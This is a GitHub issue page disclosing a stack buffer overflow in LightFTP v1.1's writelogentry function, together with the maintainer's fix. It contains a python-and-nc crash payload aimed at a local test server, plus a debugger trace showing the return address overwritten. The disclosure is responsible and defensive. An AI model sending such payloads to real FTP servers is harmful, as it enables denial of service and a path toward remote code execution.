Have a question about this project? Sign up for a free GitHub account to open an issue and contact its maintainers and the community.
By clicking “Sign up for GitHub”, you agree to our terms of service and privacy statement. We’ll occasionally send you account related emails.
Already on GitHub? Sign in to your account
Hello,
I've noticed a buffer overflow in the Unix version of LightFTP v1.1. This append in the "writelogentry" function.
With this payload : python -c 'print "USER anonymous\nPASS anonymous\n" + "A"*499 + "B"*10 + "\x0D\x0A" ' | nc 127.0.0.1 9999
python -c 'print "USER anonymous\nPASS anonymous\n" + "A"*499 + "B"*10 + "\x0D\x0A" ' | nc 127.0.0.1 9999
With this configuration :
[ftpconfig] port=9999 maxusers=1 interface=127.0.0.1 external_ip=127.0.0.1 local_mask=255.255.255.0 minport=6000 maxport=6999 logfilepath=./fftplog [anonymous] pswd=anonymous accs=readonly root=./ano [uploader] pswd=* accs=upload root=./up [ftpadmin] pswd=* accs=admin root=./adm
POC :
0x5649328723ed <writelogentry+1805> ret ← $pc 0x5649328723ee <writelogentry+1806> xchg ax, ax 0x5649328723f0 <writelogentry+1808> mov r8d, 0x30 0x5649328723f6 <writelogentry+1814> mov WORD PTR [r14+rdx*1+0x1], r8w 0x5649328723fc <writelogentry+1820> jmp 0x564932872169 <writelogentry+1161> 0x564932872401 <writelogentry+1825> nop DWORD PTR [rax+0x0] ───────────────────────────────────────────────────────────────────────────────────────────────────────────────────────[ source:../ftpserv.c+440 ]───$ 436 437 strcat(_text, CRLF); 438 439 return writeconsolestr(_text); 440 } ← $pc 441 442 void WorkerThreadCleanup(PFTPCONTEXT context) 443 { 444 struct timespec waitinterval; ───────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────[ threads ]───$ [#0] Id 3, Name: "fftp", stopped, reason: SINGLE STEP [#1] Id 2, Name: "fftp", stopped, reason: SINGLE STEP [#2] Id 1, Name: "fftp", stopped, reason: SINGLE STEP ─────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────[ trace ]───$ [#0] RetAddr: 0x5649328723ed, Name: writelogentry(context=<optimized out>, logtext1=<optimized out>, logtext2=<optimized out>) [#1] RetAddr: 0x4141414141414141 [#2] RetAddr: 0x4242414141414141 [#3] RetAddr: 0x4242424242424242 [#4] RetAddr: 0xa0d [#5] RetAddr: 0x7f6e940009c0 [#6] RetAddr: 0x7f6e99abee84 [#7] RetAddr: 0x7f6e99abeea0 [#8] RetAddr: 0x10000000a [#9] RetAddr: 0x0 ─────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────$ 0x00005649328723ed 440 } gef➤ x/10gx $rsp 0x7f6e99abee48: 0x4141414141414141 0x4242414141414141
This buffer overflow can lead to remote code execution or a denial of service. I hope this will help you to fix the vuln.
The text was updated successfully, but these errors were encountered:
POSIX version fixes
a964370
Addressing issue #5
thanks for reporting this bug. The recv buffer rcvbuf in ftp_client_thread routine limited to PATH_MAX * 2, but internal buffer _text in writelogentry is only 512 chars, resulting in buffer overflow as you pointed.
Sorry, something went wrong.
No branches or pull requests
Hello,
I've noticed a buffer overflow in the Unix version of LightFTP v1.1.
This append in the "writelogentry" function.
With this payload :
python -c 'print "USER anonymous\nPASS anonymous\n" + "A"*499 + "B"*10 + "\x0D\x0A" ' | nc 127.0.0.1 9999With this configuration :
POC :
This buffer overflow can lead to remote code execution or a denial of service.
I hope this will help you to fix the vuln.
The text was updated successfully, but these errors were encountered: